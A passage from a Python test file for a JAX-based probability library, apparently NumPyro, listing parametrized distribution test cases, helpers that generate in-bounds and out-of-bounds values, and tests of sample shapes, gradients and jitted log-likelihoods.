T(dist.AsymmetricLaplace, np.array([[1.0], [2.0]]), 2.0, np.array([3.0, 5.0])),
T(dist.AsymmetricLaplaceQuantile, 0.0, 1.0, 0.5),
T(dist.AsymmetricLaplaceQuantile, np.array([1.0, 2.0]), 2.0, 0.7),
T(
dist.AsymmetricLaplaceQuantile,
np.array([[1.0], [2.0]]),
2.0,
np.array([0.2, 0.8]),
),
T(dist.Beta, 0.2, 1.1),
T(dist.Beta, 1.0, np.array([2.0, 2.0])),
T(dist.Beta, 1.0, np.array([[1.0, 1.0], [2.0, 2.0]])),
T(dist.BetaProportion, 0.2, 10.0),
T(dist.BetaProportion, 0.51, np.array([2.0, 1.0])),
T(dist.BetaProportion, 0.5, np.array([[4.0, 4.0], [2.0, 2.0]])),
T(dist.Chi2, 2.0),
T(dist.Chi2, np.array([0.3, 1.3])),
T(dist.Cauchy, 0.0, 1.0),
T(dist.Cauchy, 0.0, np.array([1.0, 2.0])),
T(dist.Cauchy, np.array([0.0, 1.0]), np.array([[1.0], [2.0]])),
T(dist.Dirichlet, np.array([1.7])),
T(dist.Dirichlet, np.array([0.2, 1.1])),
T(dist.Dirichlet, np.array([[0.2, 1.1], [2.0, 2.0]])),
T(
dist.EulerMaruyama,
np.array([0.0, 0.1, 0.2]),
sde_fn1,
dist.Normal(0.1, 1.0),
),
T(
dist.EulerMaruyama,
np.array([0.0, 0.1, 0.2]),
sde_fn2,
dist.Normal(jnp.array([0.0, 1.0]), 1e-3).to_event(1),
),
T(
dist.EulerMaruyama,
np.array([[0.0, 0.1, 0.2], [10.0, 10.1, 10.2]]),
sde_fn2,
dist.Normal(jnp.array([0.0, 1.0]), 1e-3).to_event(1),
),
T(
dist.EulerMaruyama,
np.array([[0.0, 0.1, 0.2], [10.0, 10.1, 10.2]]),
sde_fn2,
dist.Normal(jnp.array([[0.0, 1.0], [2.0, 3.0]]), 1e-2).to_event(1),
),
T(dist.Exponential, 2.0),
T(dist.Exponential, np.array([4.0, 2.0])),
T(dist.Gamma, np.array([1.7]), np.array([[2.0], [3.0]])),
T(dist.Gamma, np.array([0.5, 1.3]), np.array([[1.0], [3.0]])),
T(dist.GaussianRandomWalk, 0.1, 10),
T(dist.GaussianRandomWalk, np.array([0.1, 0.3, 0.25]), 10),
T(
dist.GaussianCopulaBeta,
np.array([7.0, 2.0]),
np.array([4.0, 10.0]),
np.array([[1.0, 0.75], [0.75, 1.0]]),
),
T(dist.GaussianCopulaBeta, 2.0, 1.5, np.eye(3)),
T(dist.GaussianCopulaBeta, 2.0, 1.5, np.full((5, 3, 3), np.eye(3))),
T(dist.Gompertz, np.array([1.7]), np.array([[2.0], [3.0]])),
T(dist.Gompertz, np.array([0.5, 1.3]), np.array([[1.0], [3.0]])),
T(dist.Gumbel, 0.0, 1.0),
T(dist.Gumbel, 0.5, 2.0),
T(dist.Gumbel, np.array([0.0, 0.5]), np.array([1.0, 2.0])),
T(FoldedNormal, 2.0, 4.0),
T(FoldedNormal, np.array([2.0, 50.0]), np.array([4.0, 100.0])),
T(dist.HalfCauchy, 1.0),
T(dist.HalfCauchy, np.array([1.0, 2.0])),
T(dist.HalfNormal, 1.0),
T(dist.HalfNormal, np.array([1.0, 2.0])),
T(_ImproperWrapper, constraints.positive, (), (3,)),
T(dist.InverseGamma, np.array([1.7]), np.array([[2.0], [3.0]])),
T(dist.InverseGamma, np.array([0.5, 1.3]), np.array([[1.0], [3.0]])),
T(dist.Kumaraswamy, 10.0, np.array([2.0, 3.0])),
T(dist.Kumaraswamy, np.array([1.7]), np.array([[2.0], [3.0]])),
T(dist.Kumaraswamy, 0.6, 0.5),
T(dist.Laplace, 0.0, 1.0),
T(dist.Laplace, 0.5, np.array([1.0, 2.5])),
T(dist.Laplace, np.array([1.0, -0.5]), np.array([2.3, 3.0])),
T(dist.LKJ, 2, 0.5, "onion"),
T(dist.LKJ, 5, np.array([0.5, 1.0, 2.0]), "cvine"),
T(dist.LKJCholesky, 2, 0.5, "onion"),
T(dist.LKJCholesky, 2, 0.5, "cvine"),
T(dist.LKJCholesky, 5, np.array([0.5, 1.0, 2.0]), "onion"),
pytest.param(
*T(dist.LKJCholesky, 5, np.array([0.5, 1.0, 2.0]), "cvine"),
marks=pytest.mark.skipif("CI" in os.environ, reason="reduce time for CI"),
),
pytest.param(
*T(dist.LKJCholesky, 3, np.array([[3.0, 0.6], [0.2, 5.0]]), "onion"),
marks=pytest.mark.skipif("CI" in os.environ, reason="reduce time for CI"),
),
T(dist.LKJCholesky, 3, np.array([[3.0, 0.6], [0.2, 5.0]]), "cvine"),
T(dist.Logistic, 0.0, 1.0),
T(dist.Logistic, 1.0, np.array([1.0, 2.0])),
T(dist.Logistic, np.array([0.0, 1.0]), np.array([[1.0], [2.0]])),
T(dist.LogNormal, 1.0, 0.2),
T(dist.LogNormal, -1.0, np.array([0.5, 1.3])),
T(dist.LogNormal, np.array([0.5, -0.7]), np.array([[0.1, 0.4], [0.5, 0.1]])),
T(dist.LogUniform, 1.0, 2.0),
T(dist.LogUniform, 1.0, np.array([2.0, 3.0])),
T(dist.LogUniform, np.array([1.0, 2.0]), np.array([[3.0], [4.0]])),
T(
dist.MatrixNormal,
1.0 * np.arange(6).reshape(3, 2),
np.array([[1.0, 0, 0], [0.3, 0.36, 0], [0.4, 0.49, 4]]),
np.array([[1.0, 0], [0.4, 1]]),
),
T(
dist.MatrixNormal,
1.0 * np.arange(12).reshape((2, 3, 2)),
np.array([[1.0, 0, 0], [0.3, 0.36, 0], [0.4, 0.49, 4]]) * np.ones((2, 3, 3)),
np.array([[1.0, 0], [0.4, 0.5]]) * np.ones((2, 2, 2)),
),
T(
dist.MatrixNormal,
1.0 * np.arange(36).reshape((2, 3, 3, 2)),
np.identity(3),
np.identity(2),
),
T(dist.MultivariateNormal, 0.0, np.array([[1.0, 0.5], [0.5, 1.0]]), None, None),
T(
dist.MultivariateNormal,
np.array([1.0, 3.0]),
None,
np.array([[1.0, 0.5], [0.5, 1.0]]),
None,
),
T(
dist.MultivariateNormal,
np.array([1.0, 3.0]),
None,
np.array([[[1.0, 0.5], [0.5, 1.0]]]),
None,
),
T(
dist.MultivariateNormal,
np.array([2.0]),
None,
None,
np.array([[1.0, 0.0], [0.5, 1.0]]),
),
T(
dist.MultivariateNormal,
np.arange(6, dtype=np.float32).reshape((3, 2)),
None,
None,
np.array([[1.0, 0.0], [0.0, 1.0]]),
),
T(
dist.MultivariateNormal,
0.0,
None,
np.broadcast_to(np.identity(3), (2, 3, 3)),
None,
),
T(
dist.CAR,
1.2,
np.array([-0.2, 0.3]),
0.1,
np.array(
[
[0.0, 1.0, 1.0, 0.0],
[1.0, 0.0, 0.0, 1.0],
[1.0, 0.0, 0.0, 1.0],
[0.0, 1.0, 1.0, 0.0],
]
),
),
T(
dist.CAR,
np.array([0.0, 1.0, 3.0, 4.0]),
0.1,
np.array([0.3, 0.7]),
np.array(
[
[0.0, 1.0, 1.0, 0.0],
[1.0, 0.0, 0.0, 1.0],
[1.0, 0.0, 0.0, 1.0],
[0.0, 1.0, 1.0, 0.0],
]
),
),
T(
_SparseCAR,
np.array([[0.0, 1.0, 3.0, 4.0], [2.0, -1.0, -3.0, 2.0]]),
0.0,
0.1,
np.array(
[
[0.0, 1.0, 1.0, 0.0],
[1.0, 0.0, 0.0, 1.0],
[1.0, 0.0, 0.0, 1.0],
[0.0, 1.0, 1.0, 0.0],
]
),
),
T(
dist.MultivariateStudentT,
15.0,
0.0,
np.array([[1.0, 0.0], [0.5, 1.0]]),
),
T(
dist.MultivariateStudentT,
15.0,
np.array([1.0, 3.0]),
np.array([[1.0, 0.0], [0.5, 1.0]]),
),
T(
dist.MultivariateStudentT,
15.0,
np.array([1.0, 3.0]),
np.array([[[1.0, 0.0], [0.5, 1.0]]]),
),
T(
dist.MultivariateStudentT,
15.0,
np.array([3.0]),
np.array([[1.0, 0.0], [0.5, 1.0]]),
),
T(
dist.MultivariateStudentT,
15.0,
np.arange(6, dtype=np.float32).reshape((3, 2)),
np.array([[1.0, 0.0], [0.5, 1.0]]),
),
T(
dist.MultivariateStudentT,
15.0,
np.ones(3),
np.broadcast_to(np.identity(3), (2, 3, 3)),
),
T(
dist.MultivariateStudentT,
np.array(7.0),
np.array([1.0, 3.0]),
np.array([[1.0, 0.0], [0.5, 1.0]]),
),
T(
dist.MultivariateStudentT,
np.arange(20, 22, dtype=jnp.float32),
np.ones(3),
np.broadcast_to(jnp.identity(3), (2, 3, 3)),
),
T(
dist.MultivariateStudentT,
np.arange(20, 26, dtype=jnp.float32).reshape((3, 2)),
np.ones(2),
np.array([[1.0, 0.0], [0.5, 1.0]]),
),
T(
dist.LowRankMultivariateNormal,
np.zeros(2),
np.array([[1.0], [0.0]]),
np.array([1.0, 1.0]),
),
T(
dist.LowRankMultivariateNormal,
np.arange(6, dtype=jnp.float32).reshape((2, 3)),
np.arange(6, dtype=jnp.float32).reshape((3, 2)),
np.array([1.0, 2.0, 3.0]),
),
T(dist.Normal, 0.0, 1.0),
T(dist.Normal, 1.0, np.array([1.0, 2.0])),
T(dist.Normal, np.array([0.0, 1.0]), np.array([[1.0], [2.0]])),
T(dist.Pareto, 1.0, 2.0),
T(dist.Pareto, np.array([1.0, 0.5]), np.array([0.3, 2.0])),
T(dist.Pareto, np.array([[1.0], [3.0]]), np.array([1.0, 0.5])),
T(dist.RelaxedBernoulliLogits, 2.0, -10.0),
T(dist.RelaxedBernoulliLogits, np.array([1.0, 3.0]), np.array([3.0, 8.0])),
T(dist.SoftLaplace, 1.0, 1.0),
T(dist.SoftLaplace, np.array([-1.0, 50.0]), np.array([4.0, 100.0])),
T(dist.StudentT, 1.0, 1.0, 0.5),
T(dist.StudentT, 2.0, np.array([1.0, 2.0]), 2.0),
T(dist.StudentT, np.array([3.0, 5.0]), np.array([[1.0], [2.0]]), 2.0),
T(_TruncatedCauchy, 0.0, 1.0, -1.0, None),
T(_TruncatedCauchy, 0.0, np.array([1.0, 2.0]), 1.0, None),
T(
_TruncatedCauchy,
np.array([0.0, 1.0]),
np.array([[1.0], [2.0]]),
np.array([-2.0, 2.0]),
None,
),
T(_TruncatedCauchy, 0.0, 1.0, None, 1.0),
T(_TruncatedCauchy, 0.0, 1.0, -1.0, 1.0),
T(_TruncatedNormal, 0.0, 1.0, -1.0, None),
T(_TruncatedNormal, -1.0, np.array([1.0, 2.0]), 1.0, None),
T(
_TruncatedNormal,
np.array([0.0, 1.0]),
np.array([[1.0], [2.0]]),
np.array([-2.0, 2.0]),
None,
),
T(_TruncatedNormal, -1.0, 2.0, 1.0, 5.0),
T(_TruncatedNormal, np.array([-1.0, 4.0]), 2.0, None, 5.0),
T(_TruncatedNormal, -1.0, np.array([2.0, 3.0]), 1.0, None),
T(_TruncatedNormal, -1.0, 2.0, np.array([-6.0, 4.0]), np.array([-4.0, 6.0])),
T(
_TruncatedNormal,
np.array([0.0, 1.0]),
np.array([[1.0], [2.0]]),
None,
np.array([-2.0, 2.0]),
),
T(dist.TwoSidedTruncatedDistribution, dist.Laplace(0.0, 1.0), -2.0, 3.0),
T(dist.Uniform, 0.0, 2.0),
T(dist.Uniform, 1.0, np.array([2.0, 3.0])),
T(dist.Uniform, np.array([0.0, 0.0]), np.array([[2.0], [3.0]])),
T(dist.Weibull, 0.2, 1.1),
T(dist.Weibull, 2.8, np.array([2.0, 2.0])),
T(dist.Weibull, 1.8, np.array([[1.0, 1.0], [2.0, 2.0]])),
T(
_GaussianMixture,
np.ones(3) / 3.0,
np.array([0.0, 7.7, 2.1]),
np.array([4.2, 7.7, 2.1]),
),
T(
_Gaussian2DMixture,
np.array([0.2, 0.5, 0.3]),
np.array([[-1.2, 1.5], [2.0, 2.0], [-1, 4.0]]), # Mean
np.array(
[
[
[0.1, -0.2],
[-0.2, 1.0],
],
[
[0.75, 0.0],
[0.0, 0.75],
],
[
[1.0, 0.5],
[0.5, 0.27],
],
]
), # Covariance
),
T(
_GeneralMixture,
np.array([0.2, 0.3, 0.5]),
np.array([0.0, 7.7, 2.1]),
np.array([4.2, 1.7, 2.1]),
),
T(
_General2DMixture,
np.array([0.2, 0.5, 0.3]),
np.array([[-1.2, 1.5], [2.0, 2.0], [-1, 4.0]]), # Mean
np.array(
[
[
[0.1, -0.2],
[-0.2, 1.0],
],
[
[0.75, 0.0],
[0.0, 0.75],
],
[
[1.0, 0.5],
[0.5, 0.27],
],
]
), # Covariance
),
]
DIRECTIONAL = [
T(dist.VonMises, 2.0, 10.0),
T(dist.VonMises, 2.0, np.array([150.0, 10.0])),
T(dist.VonMises, np.array([1 / 3 * np.pi, -1.0]), np.array([20.0, 30.0])),
pytest.param(
*T(
dist.SineBivariateVonMises,
0.0,
0.0,
5.0,
6.0,
2.0,
),
marks=pytest.mark.skipif("CI" in os.environ, reason="reduce time for CI"),
),
T(
dist.SineBivariateVonMises,
3.003,
-1.343,
5.0,
6.0,
2.0,
),
pytest.param(
*T(
dist.SineBivariateVonMises,
-1.232,
-1.3430,
3.4,
2.0,
1.0,
),
marks=pytest.mark.skipif("CI" in os.environ, reason="reduce time for CI"),
),
pytest.param(
*T(
dist.SineBivariateVonMises,
np.array([math.pi - 0.2, 1.0]),
np.array([0.0, 1.0]),
np.array([5.0, 5.0]),
np.array([7.0, 0.5]),
None,
np.array([0.5, 0.1]),
),
marks=pytest.mark.skipif("CI" in os.environ, reason="reduce time for CI"),
),
T(dist.ProjectedNormal, np.array([0.0, 0.0])),
T(dist.ProjectedNormal, np.array([[2.0, 3.0]])),
T(dist.ProjectedNormal, np.array([0.0, 0.0, 0.0])),
T(dist.ProjectedNormal, np.array([[-1.0, 2.0, 3.0]])),
T(SineSkewedUniform, np.array([-math.pi / 4, 0.1])),
T(SineSkewedVonMises, np.array([0.342355])),
T(SineSkewedVonMisesBatched, np.array([[0.342355, -0.0001], [0.91, 0.09]])),
]
DISCRETE = [
T(dist.BetaBinomial, 2.0, 5.0, 10),
T(
dist.BetaBinomial,
np.array([2.0, 4.0]),
np.array([5.0, 3.0]),
np.array([10, 12]),
),
T(dist.BernoulliProbs, 0.2),
T(dist.BernoulliProbs, np.array([0.2, 0.7])),
T(dist.BernoulliLogits, np.array([-1.0, 3.0])),
T(dist.BinomialProbs, np.array([0.2, 0.7]), np.array([10, 2])),
T(dist.BinomialProbs, np.array([0.2, 0.7]), np.array([5, 8])),
T(dist.BinomialLogits, np.array([-1.0, 3.0]), np.array([5, 8])),
T(dist.CategoricalProbs, np.array([1.0])),
T(dist.CategoricalProbs, np.array([0.1, 0.5, 0.4])),
T(dist.CategoricalProbs, np.array([[0.1, 0.5, 0.4], [0.4, 0.4, 0.2]])),
T(dist.CategoricalLogits, np.array([-5.0])),
T(dist.CategoricalLogits, np.array([1.0, 2.0, -2.0])),
T(dist.CategoricalLogits, np.array([[-1, 2.0, 3.0], [3.0, -4.0, -2.0]])),
T(dist.Delta, 1),
T(dist.Delta, np.array([0.0, 2.0])),
T(dist.Delta, np.array([0.0, 2.0]), np.array([-2.0, -4.0])),
T(dist.DirichletMultinomial, np.array([1.0, 2.0, 3.9]), 10),
T(dist.DirichletMultinomial, np.array([0.2, 0.7, 1.1]), np.array([5, 5])),
T(dist.GammaPoisson, 2.0, 2.0),
T(dist.GammaPoisson, np.array([6.0, 2]), np.array([2.0, 8.0])),
T(dist.GeometricProbs, 0.2),
T(dist.GeometricProbs, np.array([0.2, 0.7])),
T(dist.GeometricLogits, np.array([-1.0, 3.0])),
T(dist.MultinomialProbs, np.array([0.2, 0.7, 0.1]), 10),
T(dist.MultinomialProbs, np.array([0.2, 0.7, 0.1]), np.array([5, 8])),
T(dist.MultinomialLogits, np.array([-1.0, 3.0]), np.array([[5], [8]])),
T(dist.NegativeBinomialProbs, 10, 0.2),
T(dist.NegativeBinomialProbs, 10, np.array([0.2, 0.6])),
T(dist.NegativeBinomialProbs, np.array([4.2, 10.7, 2.1]), 0.2),
T(
dist.NegativeBinomialProbs,
np.array([4.2, 10.7, 2.1]),
np.array([0.2, 0.6, 0.5]),
),
T(dist.NegativeBinomialLogits, 10, -2.1),
T(dist.NegativeBinomialLogits, 10, np.array([-5.2, 2.1])),
T(dist.NegativeBinomialLogits, np.array([4.2, 10.7, 2.1]), -5.2),
T(
dist.NegativeBinomialLogits,
np.array([4.2, 7.7, 2.1]),
np.array([4.2, 0.7, 2.1]),
),
T(dist.NegativeBinomial2, 0.3, 10),
T(dist.NegativeBinomial2, np.array([10.2, 7, 31]), 10),
T(dist.NegativeBinomial2, np.array([10.2, 7, 31]), np.array([10.2, 20.7, 2.1])),
T(dist.OrderedLogistic, -2, np.array([-10.0, 4.0, 9.0])),
T(dist.OrderedLogistic, np.array([-4, 3, 4, 5]), np.array([-1.5])),
T(dist.DiscreteUniform, -2, np.array([-1.0, 4.0, 9.0])),
T(dist.DiscreteUniform, np.array([-4, 3, 4, 5]), np.array([6])),
T(dist.Poisson, 2.0),
T(dist.Poisson, np.array([2.0, 3.0, 5.0])),
T(SparsePoisson, 2.0),
T(SparsePoisson, np.array([2.0, 3.0, 5.0])),
T(SparsePoisson, 2),
T(dist.ZeroInflatedPoisson, 0.6, 2.0),
T(dist.ZeroInflatedPoisson, np.array([0.2, 0.7, 0.3]), np.array([2.0, 3.0, 5.0])),
T(ZeroInflatedPoissonLogits, 2.0, 3.0),
T(
ZeroInflatedPoissonLogits,
np.array([0.2, 4.0, 0.3]),
np.array([2.0, -3.0, 5.0]),
),
]
def _is_batched_multivariate(jax_dist):
return len(jax_dist.event_shape) > 0 and len(jax_dist.batch_shape) > 0
def gen_values_within_bounds(constraint, size, key=random.PRNGKey(11)):
eps = 1e-6
if constraint is constraints.boolean:
return random.bernoulli(key, shape=size)
elif isinstance(constraint, constraints.greater_than):
return jnp.exp(random.normal(key, size)) + constraint.lower_bound + eps
elif isinstance(constraint, constraints.integer_interval):
lower_bound = jnp.broadcast_to(constraint.lower_bound, size)
upper_bound = jnp.broadcast_to(constraint.upper_bound, size)
return random.randint(key, size, lower_bound, upper_bound + 1)
elif isinstance(constraint, constraints.integer_greater_than):
return constraint.lower_bound + random.poisson(key, np.array(5), shape=size)
elif isinstance(constraint, constraints.interval):
lower_bound = jnp.broadcast_to(constraint.lower_bound, size)
upper_bound = jnp.broadcast_to(constraint.upper_bound, size)
return random.uniform(key, size, minval=lower_bound, maxval=upper_bound)
elif constraint in (constraints.real, constraints.real_vector):
return random.normal(key, size)
elif constraint is constraints.simplex:
return osp.dirichlet.rvs(alpha=jnp.ones((size[-1],)), size=size[:-1])
elif isinstance(constraint, constraints.multinomial):
n = size[-1]
return multinomial(
key, p=jnp.ones((n,)) / n, n=constraint.upper_bound, shape=size[:-1]
)
elif constraint is constraints.corr_cholesky:
return signed_stick_breaking_tril(
random.uniform(
key, size[:-2] + (size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1
)
)
elif constraint is constraints.corr_matrix:
cholesky = signed_stick_breaking_tril(
random.uniform(
key, size[:-2] + (size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1
)
)
return jnp.matmul(cholesky, jnp.swapaxes(cholesky, -2, -1))
elif constraint is constraints.lower_cholesky:
return jnp.tril(random.uniform(key, size))
elif constraint is constraints.positive_definite:
x = random.normal(key, size)
return jnp.matmul(x, jnp.swapaxes(x, -2, -1))
elif constraint is constraints.ordered_vector:
x = jnp.cumsum(random.exponential(key, size), -1)
return x - random.normal(key, size[:-1] + (1,))
elif isinstance(constraint, constraints.independent):
return gen_values_within_bounds(constraint.base_constraint, size, key)
elif constraint is constraints.sphere:
x = random.normal(key, size)
return x / jnp.linalg.norm(x, axis=-1)
elif constraint is constraints.l1_ball:
key1, key2 = random.split(key)
sign = random.bernoulli(key1)
bounds = [0, (-1) ** sign * 0.5]
return random.uniform(key, size, float, *sorted(bounds))
else:
raise NotImplementedError("{} not implemented.".format(constraint))
def gen_values_outside_bounds(constraint, size, key=random.PRNGKey(11)):
if constraint is constraints.boolean:
return random.bernoulli(key, shape=size) - 2
elif isinstance(constraint, constraints.greater_than):
return constraint.lower_bound - jnp.exp(random.normal(key, size))
elif isinstance(constraint, constraints.integer_interval):
lower_bound = jnp.broadcast_to(constraint.lower_bound, size)
return random.randint(key, size, lower_bound - 1, lower_bound)
elif isinstance(constraint, constraints.integer_greater_than):
return constraint.lower_bound - random.poisson(key, np.array(5), shape=size)
elif isinstance(constraint, constraints.interval):
upper_bound = jnp.broadcast_to(constraint.upper_bound, size)
return random.uniform(key, size, minval=upper_bound, maxval=upper_bound + 1.0)
elif constraint in [constraints.real, constraints.real_vector]:
return lax.full(size, np.nan)
elif constraint is constraints.simplex:
return osp.dirichlet.rvs(alpha=jnp.ones((size[-1],)), size=size[:-1]) + 1e-2
elif isinstance(constraint, constraints.multinomial):
n = size[-1]
return (
multinomial(
key, p=jnp.ones((n,)) / n, n=constraint.upper_bound, shape=size[:-1]
)
+ 1
)
elif constraint is constraints.corr_cholesky:
return (
signed_stick_breaking_tril(
random.uniform(
key,
size[:-2] + (size[-1] * (size[-1] - 1) // 2,),
minval=-1,
maxval=1,
)
)
+ 1e-2
)
elif constraint is constraints.corr_matrix:
cholesky = 1e-2 + signed_stick_breaking_tril(
random.uniform(
key, size[:-2] + (size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1
)
)
return jnp.matmul(cholesky, jnp.swapaxes(cholesky, -2, -1))
elif constraint is constraints.lower_cholesky:
return random.uniform(key, size)
elif constraint is constraints.positive_definite:
return random.normal(key, size)
elif constraint is constraints.ordered_vector:
x = jnp.cumsum(random.exponential(key, size), -1)
return x[..., ::-1]
elif isinstance(constraint, constraints.independent):
return gen_values_outside_bounds(constraint.base_constraint, size, key)
elif constraint is constraints.sphere:
x = random.normal(key, size)
x = x / jnp.linalg.norm(x, axis=-1, keepdims=True)
return 2 * x
elif constraint is constraints.l1_ball:
key1, key2 = random.split(key)
sign = random.bernoulli(key1)
bounds = [(-1) ** sign * 1.1, (-1) ** sign * 2]
return random.uniform(key, size, float, *sorted(bounds))
else:
raise NotImplementedError("{} not implemented.".format(constraint))
@pytest.mark.parametrize(
"jax_dist, sp_dist, params", CONTINUOUS + DISCRETE + DIRECTIONAL
)
@pytest.mark.parametrize("prepend_shape", [(), (2,), (2, 3)])
def test_dist_shape(jax_dist, sp_dist, params, prepend_shape):
jax_dist = jax_dist(*params)
rng_key = random.PRNGKey(0)
expected_shape = prepend_shape + jax_dist.batch_shape + jax_dist.event_shape
samples = jax_dist.sample(key=rng_key, sample_shape=prepend_shape)
assert isinstance(samples, jnp.ndarray)
assert jnp.shape(samples) == expected_shape
if (
sp_dist
and not _is_batched_multivariate(jax_dist)
and not isinstance(jax_dist, dist.MultivariateStudentT)
):
sp_dist = sp_dist(*params)
sp_samples = sp_dist.rvs(size=prepend_shape + jax_dist.batch_shape)
assert jnp.shape(sp_samples) == expected_shape
elif (
sp_dist
and not _is_batched_multivariate(jax_dist)
and isinstance(jax_dist, dist.MultivariateStudentT)
):
sp_dist = sp_dist(*params)
size_ = prepend_shape + jax_dist.batch_shape
size = (1) if size_ == () else size_
try:
sp_samples = sp_dist.rvs(size=size)
except ValueError:
pytest.skip("scipy multivariate t doesn't support size with > 1 element")
assert jnp.shape(sp_samples) == expected_shape
if isinstance(jax_dist, (dist.MultivariateNormal, dist.MultivariateStudentT)):
assert jax_dist.covariance_matrix.ndim == len(jax_dist.batch_shape) + 2
assert_allclose(
jax_dist.precision_matrix,
jnp.linalg.inv(jax_dist.covariance_matrix),
rtol=1e-6,
)
@pytest.mark.parametrize(
"jax_dist, sp_dist, params", CONTINUOUS + DISCRETE + DIRECTIONAL
)
def test_infer_shapes(jax_dist, sp_dist, params):
shapes = tuple(getattr(p, "shape", ()) for p in params)
shapes = tuple(x() if callable(x) else x for x in shapes)
jax_dist = jax_dist(*params)
try:
expected_batch_shape, expected_event_shape = type(jax_dist).infer_shapes(
*shapes
)
except NotImplementedError:
pytest.skip(f"{type(jax_dist).__name__}.infer_shapes() is not implemented")
assert jax_dist.batch_shape == expected_batch_shape
assert jax_dist.event_shape == expected_event_shape
@pytest.mark.parametrize(
"jax_dist, sp_dist, params", CONTINUOUS + DISCRETE + DIRECTIONAL
)
def test_has_rsample(jax_dist, sp_dist, params):
jax_dist = jax_dist(*params)
masked_dist = jax_dist.mask(False)
indept_dist = jax_dist.expand_by([2]).to_event(1)
transf_dist = dist.TransformedDistribution(jax_dist, biject_to(constraints.real))
assert masked_dist.has_rsample == jax_dist.has_rsample
assert indept_dist.has_rsample == jax_dist.has_rsample
assert transf_dist.has_rsample == jax_dist.has_rsample
if jax_dist.has_rsample:
assert isinstance(jax_dist, dist.Delta) or not jax_dist.is_discrete
if isinstance(jax_dist, dist.TransformedDistribution):
assert jax_dist.base_dist.has_rsample
else:
assert set(jax_dist.arg_constraints) == set(jax_dist.reparametrized_params)
jax_dist.rsample(random.PRNGKey(0))
if isinstance(jax_dist, dist.Normal):
masked_dist.rsample(random.PRNGKey(0))
indept_dist.rsample(random.PRNGKey(0))
transf_dist.rsample(random.PRNGKey(0))
else:
with pytest.raises(NotImplementedError):
jax_dist.rsample(random.PRNGKey(0))
if isinstance(jax_dist, dist.BernoulliProbs):
with pytest.raises(NotImplementedError):
masked_dist.rsample(random.PRNGKey(0))
with pytest.raises(NotImplementedError):
indept_dist.rsample(random.PRNGKey(0))
with pytest.raises(NotImplementedError):
transf_dist.rsample(random.PRNGKey(0))
@pytest.mark.parametrize("batch_shape", [(), (4,), (3, 2)])
def test_unit(batch_shape):
log_factor = random.normal(random.PRNGKey(0), batch_shape)
d = dist.Unit(log_factor=log_factor)
x = d.sample(random.PRNGKey(1))
assert x.shape == batch_shape + (0,)
assert (d.log_prob(x) == log_factor).all()
@pytest.mark.parametrize("jax_dist, sp_dist, params", CONTINUOUS)
def test_sample_gradient(jax_dist, sp_dist, params):
# we have pathwise gradient for gamma sampler
gamma_derived_params = {
"Gamma": ["concentration"],
"Beta": ["concentration1", "concentration0"],
"BetaProportion": ["mean", "concentration"],
"Chi2": ["df"],
"Dirichlet": ["concentration"],
"InverseGamma": ["concentration"],
"LKJ": ["concentration"],
"LKJCholesky": ["concentration"],
"StudentT": ["df"],
}.get(jax_dist.__name__, [])
dist_args = [
p
for p in (
inspect.getfullargspec(jax_dist.__init__)[0][1:]
if inspect.isclass(jax_dist)
# account the the case jax_dist is a function
else inspect.getfullargspec(jax_dist)[0]
)
]
params_dict = dict(zip(dist_args[: len(params)], params))
jax_class = type(jax_dist(**params_dict))
reparametrized_params = [
p for p in jax_class.reparametrized_params if p not in gamma_derived_params
]
if not reparametrized_params:
pytest.skip("{} not reparametrized.".format(jax_class.__name__))
nonrepara_params_dict = {
k: v for k, v in params_dict.items() if k not in reparametrized_params
}
repara_params = tuple(
v for k, v in params_dict.items() if k in reparametrized_params
)
rng_key = random.PRNGKey(0)
def fn(args):
args_dict = dict(zip(reparametrized_params, args))
return jnp.sum(
jax_dist(**args_dict, **nonrepara_params_dict).sample(key=rng_key)
)
actual_grad = jax.grad(fn)(repara_params)
assert len(actual_grad) == len(repara_params)
eps = 1e-3
for i in range(len(repara_params)):
if repara_params[i] is None:
continue
args_lhs = [p if j != i else p - eps for j, p in enumerate(repara_params)]
args_rhs = [p if j != i else p + eps for j, p in enumerate(repara_params)]
fn_lhs = fn(args_lhs)
fn_rhs = fn(args_rhs)
# finite diff approximation
expected_grad = (fn_rhs - fn_lhs) / (2.0 * eps)
assert jnp.shape(actual_grad[i]) == jnp.shape(repara_params[i])
assert_allclose(jnp.sum(actual_grad[i]), expected_grad, rtol=0.02, atol=0.03)
@pytest.mark.parametrize(
"jax_dist, params",
[
(dist.Gamma, (1.0,)),
(dist.Gamma, (0.1,)),
(dist.Gamma, (10.0,)),
(dist.Chi2, (1.0,)),
(dist.Chi2, (0.1,)),
(dist.Chi2, (10.0,)),
(dist.Beta, (1.0, 1.0)),
(dist.StudentT, (5.0, 2.0, 4.0)),
],
)
def test_pathwise_gradient(jax_dist, params):
rng_key = random.PRNGKey(0)
N = 1000000
def f(params):
z = jax_dist(*params).sample(key=rng_key, sample_shape=(N,))
return (z + z**2).mean(0)
def g(params):
d = jax_dist(*params)
return d.mean + d.variance + d.mean**2
actual_grad = grad(f)(params)
expected_grad = grad(g)(params)
assert_allclose(actual_grad, expected_grad, rtol=0.005)
@pytest.mark.parametrize(
"jax_dist, sp_dist, params", CONTINUOUS + DISCRETE + DIRECTIONAL
)
def test_jit_log_likelihood(jax_dist, sp_dist, params):
if jax_dist.__name__ in (
"EulerMaruyama",
"GaussianRandomWalk",
"_ImproperWrapper",
"LKJ",
"LKJCholesky",
"_SparseCAR",
):
pytest.xfail(reason="non-jittable params")
rng_key = random.PRNGKey(0)
samples = jax_dist(*params).sample(key=rng_key, sample_shape=(2, 3))
def log_likelihood(*params):
return jax_dist(*params).log_prob(samples)
expected = log_likelihood(*params)
actual = jax.jit(log_likelihood)(*params)
assert_allclose(actual, expected, atol=2e-5, rtol=2e-5)
@pytest.mark.parametrize(
"jax_dist, sp_dist, params", CONTINUOUS + DISCRETE + DIRECTIONAL
)
@pytest.mark.parametrize("prepend_shape", [(), (2,), (2, 3)])
@pytest.mark.parametrize("jit", [False, True])
def test_log_prob(jax_dist, sp_dist, params, prepend_shape, jit):
jit_fn = _identity if not jit else jax.jit
jax_dist = jax_dist(*params)
rng_key = random.PRNGKey(0)
samples = jax_dist.sample(key=rng_key, sample_shape=prepend_shape)
assert jax_dist.log_prob(samples).shape == prepend_shape + jax_dist.batch_shape
truncated_dists = (
dist.LeftTruncatedDistribution,
dist.RightTruncatedDistribution,
dist.TwoSidedTruncatedDistribution,
)
if sp_dist is None:
if isinstance(jax_dist, truncated_dists):
